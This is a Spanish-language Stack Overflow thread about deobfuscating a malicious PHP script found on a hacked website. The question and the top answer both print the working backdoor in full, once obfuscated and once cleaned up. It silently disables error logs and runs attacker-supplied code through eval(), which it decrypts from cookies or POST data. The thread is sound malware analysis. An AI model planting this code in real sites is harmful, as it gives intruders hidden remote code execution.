# Desofuscar código php

Tags: php, desofuscación

Estaba analizando unos archivos PHP comprometidos y me tope con algunos scripts ofuscados, a continuación coloco uno de estos:

```
<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;
$ {
    "\x47\x4c\x4fB\x41\x4c\x53"
}

['p0279'] = "\x74\x4b\x2a\x4a\x26\x21\xa\x64\x6b\x61\x2e\xd\x3f\x3d\x73\x3c\x65\x2b\x9\x2d\x6a\x55\x24\x6f\x44\x5f\x79\x5a\x7d\x33\x46\x32\x50\x54\x63\x2c\x7c\x77\x75\x7a\x30\x27\x62\x52\x22\x4d\x39\x58\x41\x6c\x5c\x53\x76\x68\x20\x60\x57\x59\x6d\x5b\x66\x43\x23\x40\x7b\x3b\x4c\x2f\x49\x78\x29\x45\x5e\x28\x3a\x56\x70\x67\x69\x34\x38\x42\x31\x6e\x72\x25\x5d\x47\x7e\x51\x36\x4f\x35\x48\x3e\x4e\x37\x71";
$a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]] = $a1c573['p0279'][34] . $a1c573['p0279'][53] . $a1c573['p0279'][84];
$a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]] = $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][7];
$a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]] = $a1c573['p0279'][14] . $a1c573['p0279'][0] . $a1c573['p0279'][84] . $a1c573['p0279'][49] . $a1c573['p0279'][16] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]] = $a1c573['p0279'][78] . $a1c573['p0279'][83] . $a1c573['p0279'][78] . $a1c573['p0279'][25] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]] = $a1c573['p0279'][76] . $a1c573['p0279'][53] . $a1c573['p0279'][76] . $a1c573['p0279'][52] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][14] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]] = $a1c573['p0279'][38] . $a1c573['p0279'][83] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]] = $a1c573['p0279'][42] . $a1c573['p0279'][9] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][90] . $a1c573['p0279'][79] . $a1c573['p0279'][25] . $a1c573['p0279'][7] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][23] . $a1c573['p0279'][7] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][78] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]] = $a1c573['p0279'][8] . $a1c573['p0279'][9] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][96] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92];
$a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]] = $a1c573['p0279'][77] . $a1c573['p0279'][82] . $a1c573['p0279'][82] . $a1c573['p0279'][96] . $a1c573['p0279'][29];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $_POST;
$a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] = $_COOKIE;
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77], NULL);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][14], 0);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][69] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][69] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][38] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16], 0);
@$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]](0);
$n68b9ce = NULL;
$r8fa539 = NULL;
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][31] . $a1c573['p0279'][96] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][9] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][9]] = $a1c573['p0279'][16] . $a1c573['p0279'][82] . $a1c573['p0279'][16] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][19] . $a1c573['p0279'][82] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][60] . $a1c573['p0279'][19] . $a1c573['p0279'][79] . $a1c573['p0279'][92] . $a1c573['p0279'][46] . $a1c573['p0279'][29] . $a1c573['p0279'][19] . $a1c573['p0279'][9] . $a1c573['p0279'][40] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][19] . $a1c573['p0279'][46] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][82] . $a1c573['p0279'][80] . $a1c573['p0279'][7] . $a1c573['p0279'][40] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][92] . $a1c573['p0279'][92] . $a1c573['p0279'][90];
global $t2703af9a;

function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

function ka9e97e75($n68b9ce, $me55b842b)
{
    global $a1c573;
    global $t2703af9a;
    return $a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($n68b9ce, $t2703af9a) , $me55b842b);
}

foreach($a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] as $me55b842b => $s51f5) {
    $n68b9ce = $s51f5;
    $r8fa539 = $me55b842b;
}

if (!$n68b9ce) {
    foreach($a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] as $me55b842b => $s51f5) {
        $n68b9ce = $s51f5;
        $r8fa539 = $me55b842b;
    }
}

$n68b9ce = @$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]]($a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]]($a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]]($n68b9ce) , $r8fa539));

if (isset($n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $sa5c67645 = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]]() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]]($sa5c67645);
    }
    elseif ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($n68b9ce[$a1c573['p0279'][7]]);
    }

    exit();
} 
?>
```

Para entender un poco mejor estos *scripts* hice un `print_r` de la variable `$GLOBALS` obteniendo lo siguiente:

```
Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

    [GLOBALS] => Array
 *RECURSION*
    [i9c4] => 487
    [a1c573] => Array
 *RECURSION*
    [p0279] => tK*J&!
dka.
?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q
    [rbe75] => chr
    [g6725] => ord
    [a24153d81] => strlen
    [u1fdc] => ini_set
    [b4729dcb] => serialize
    [u7338c5be] => phpversion
    [ma7c] => unserialize
    [ta5ac] => base64_decode
    [f673ece06] => set_time_limit
    [p6d2c3c4] => ka9e97e75
    [kf9e4b] => g1173
    [f5cb] => Array
        (
        )

    [ha750e999] => Array
        (
        )

    [n68b9ce] => 
    [r8fa539] => 
    [t2703af9a] => e1e335a5-1c6f-4593-a00e-90318d0c6556
)
```

En base a esto mi pregunta es:

**¿Existe alguna manera de desofuscar este código para hacerlo más entendible?** o **¿se puede hacer algo para saber cual es el funcionamiento del mismo?**

Answer (score 8, accepted):

```
$a1c573 = $GLOBALS;
```

Fíjate que `$a1c573` se usa en casi todo el código. Hasta la siguiente línea lo único que se hace es inicializar el array de `$GOBALS`:

```
global $t2703af9a;
```

Si haces un pequeño script que imprima el contenido de `$aqc573['p0279']` de tal forma que te indique la posición de cada elemento, el carácter asociado y la correspondencia entera de dicho valor (por si caso). Algo así:

```
0: t 116
1: K 75
2: * 42
3: J 74
4: & 38
5: ! 33
6:   10
7: d 100
8: k 107
9: a 97
10: . 46
11:   13
12: ? 63
13: = 61
...
```

Y ahora si, por ejemplo, coges la primera función:

```
function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}
```

Sustituye `$sa5c67645` por `$i`, `$n68b9ce` por `$param1` y `$me55b842b` por `$param2`.

Si nos centramos en el if, la condición hace ahora referencia a:

```
$i < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce)
```

Hacemos la traducción de las referencias a `p0279` y nos queda:

```
$i < $a1c573["a24103d81"]($param1)
```

Si miramos en `$GLOBALS` el contenido de la posición `a24103d81` vemos que se corresponde con el comando `strlen`, luego el bucle queda así:

```
for ($i = 0; $i < strlen($param1); )
```

Hacemos lo mismo para el segundo bucle y su contenido. Finalmente la función queda así:

```
function g1173($param1, $param2)
{
  global $a1c573;
  $toReturn = "";
  for ($i = 0; $i < strlen($param1); ) {
    for ($j = 0; $j < strlen($param2) && $i < strlen($param1); $j++, $i++) {
      $toReturn.= chr(ord($param1[$i]) ^ ord($param2[$j]));
    }
  }

  return $toReturn;
}
```

Y el resto es más de lo mismo, lo mismo puedes hacer un script que realice unas primeras traducciones de `$a1c573['p0279']` en su caracter correspondiente para is desgranando el código.

Answer (score 14):

La mayoría de scripts ofuscados en PHP pueden desofuscarse usando 4 métodos, pueden existir más pero estos he encontrado hasta el momento, antes de ir a los métodos mencionados, voy a colocar algunas herramientas que pueden ser útiles para llevar a cabo esta tarea.

## Herramientas comunes para desofuscar código PHP

1. [UnPHP](https://www.unphp.net/). Esta herramienta ayuda enormemente a la desofuscación de scripts que contienen funciones en exceso. En muchos casos, este sitio y algunos similares, deberían ser los primeros en visitarse para entender un poco mejor el código ofuscado. Sin embargo, en algunos casos UnPHP no podrá desofuscar el código inicial. En estos casos, será necesario usara otras herramientas para poder lograr desofuscar el script.
2. [PHP Beautifier](http://phpbeautifier.com/). Esta es una herramienta excelente para dar formato al código que esta ilegible en una sola linea, de esta manera el código quedara identado y sera más fácil de leer.
3. [Base64 decoders](https://www.google.com/search?q=base64%20decode). En este caso el link es una búsqueda de google, ya que existe variedad de este tipo de herramientas que pueden ser usadas de manera online, o ejecutándolas en nuestra maquina instalandolas de manera local.
4. [PHP Sandbox](http://sandbox.onlinephpfunctions.com/). Esta herramienta es muy util para correr los scripts ofuscados, ya que pueden ser una especie de malware o realizar conecciones remotas, por lo que no se recomienda ejecutar código en nuestro propio server. Existen mas herramientas como esta que se pueden buscar en google, se puede usar la que más nos guste.

## Métodos de ofuscación comunes

Existen diferentes métodos en que los hackers o programadores ofuscan su código, a continuación algunas técnicas comunes para hacerlo, y de esta manera entender un poco mejor como realizar la tarea inversa.

1. [ASCII Encoding](http://www.ascii-code.com/). Se puede buscar el numero hexadecimal en la lista del link. En PHP, estos códigos hexadecimales pueden ser representados por una **barra invertida x seguida de un número o letra**.

   **Ejemplos:**

   ```
   \x48 = H
   \x34 = 4
   \x78 = x
   ```

Sin embargo, estos caracteres no necesariamente son representados solo con `\x`, tambien se puede usar `\#` tranquilamente.

2. [Unicode strings](http://unicode-table.com/en/search/?q=lame). Parecida a la forma anterior, pero se usa `\u#` en vez de `\x#`.

   **Ejemplos:**

   ```
   \u004D = M
   \u0065 = e
   \u0020 =  (space)
   \u0070 = p
   \u006c = l
   \u0073\ = s
   ```
3. [Base64 encoding](https://en.wikipedia.org/wiki/Base64). Base64 es un poco diferente a los metodos de ofuscación antes mencionados, pero sigue siendo relativamente sencillo de decodificar.

   **Example strings:**

   ```
    SSBsaWtlIGRvbnV0cw== = I like donuts

    ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));

    QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control
   ```
4. **Basura almacenada en un cadena**, es decir una cadena separada por ciclos for, while, expresiones regex, etc. Estas necesitan ser decodificadas manualmente por uno mismo, ya que varían considerablemente. Afortunadamente los métodos anteriores pueden ayudar de mejor manera a desofuscar este tipo de cadenas.

## Desofuscando nombres de variables

Si no es posible desofuscar los nombres de variables a través de los métodos mencionados previamente, entonces la desofuscacion de los mismos deben hacerse manualmente,lo cual es un proceso que consume bastante tiempo. Como se menciona en la [respuesta](https://es.stackoverflow.com/a/33655/2429) de @Eferion

Afortunadamente, buscando por patrones comunes de malware como apagar los archivos de log, usar la función eval(), o preg_replace() con ofuscación, indica que algo esta mal.

La ofuscación es un enfoque equivocado, si se encuentra codigo ofuscado en un archivo del sitio web comprometido, se debe asumir que el sitio a sido hackeado. No se debería ofuscar nuestro propio código.

> La seguridad a expensas de la usabilidad no es seguridad.

## Riesgos de la Desofuscación

Tratar de decodificar estos archivos en nuestro propio servidor web no es seguro por muchas razones, algunas de las cuales pueden ser desconocidas para nosotros. No se debe intenta desofuscar archivos PHP en su propio servidor web. Debido a que se podría inadvertidamente introducir puertas traseras adicionales, o ayudar al malware en la propagación de sí mismo porque muchos de los scripts cargan funciones de forma remota.

## Código Desofuscado

Después de seguir los métodos antes mencionados, pude llegar a obtener el siguiente codigo desofuscado:

```
<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;

$ {
    "GLOBALS"
}

['p0279'] = 'tK*J&!dka.?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0\'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q';
$a1c573['rbe75'] = chr;
$a1c573['g6725'] = ord;
$a1c573['a24153d81'] = strlen;
$a1c573['u1fdc'] = ini_set;
$a1c573['b4729dcb'] = serialize;
$a1c573['u7338c5be'] = phpversion;
$a1c573['ma7c'] = unserialize;
$a1c573['ta5ac'] = base64_decode;
$a1c573['f673ece06'] = set_time_limit;
$a1c573['p6d2c3c4'] = ka9e97e75;
$a1c573['kf9e4b'] = g1173;
$a1c573['f5cb'] = $_POST;
$a1c573['ha750e999'] = $_COOKIE;
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
$parametro_1 = NULL;
$r8fa539 = NULL;
$a1c573['t2703af9a'] = 'e1e335a5-1c6f-4593-a00e-90318d0c6556';
global $t2703af9a;

function g1173($parametro_1, $parametro_2)
{
    global $a1c573;
    $retorno = "";
    for ($i = 0; $i < strlen($parametro_1);) {
        for ($j = 0; $j < strlen($parametro_2) && $i < strlen($parametro_1); $j++, $i++) {
            $retorno.= chr(ord($parametro_1[$i]) ^ ord($parametro_2[$j]));
        }
    }

    return $retorno;
}

function ka9e97e75($parametro_1, $parametro_2)
{
    global $a1c573;
    global $t2703af9a;
    return g1173(g1173($parametro_1, $t2703af9a) , $parametro_2);
}

foreach($_COOKIE as $parametro_2 => $s51f5) {
    $parametro_1 = $s51f5;
    $r8fa539 = $parametro_2;
}

if (!$parametro_1) {
    foreach($_POST as $parametro_2 => $s51f5) {
        $parametro_1 = $s51f5;
        $r8fa539 = $parametro_2;
    }
}

$parametro_1 = @unserialize(ka9e97e75(base64_decode($parametro_1) , $r8fa539));

if (isset($parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $parametro_1[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $i = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @phpversion() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @serialize($i);
    }
    elseif ($parametro_1[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($parametro_1[$a1c573['p0279'][7]]);
    }

    exit();
}
?>
```

Esta respuesta esta basada en información encontrada en la comunidad:

[Information Security](https://security.stackexchange.com/) de Stack Exchange

Answer (score 0):

Hay programas del tipo [dezender](http://dezender.net/) (DeZender / De-ionCube) online, prueba con alguno. Básicamente necesitas un desofuscador de codigo php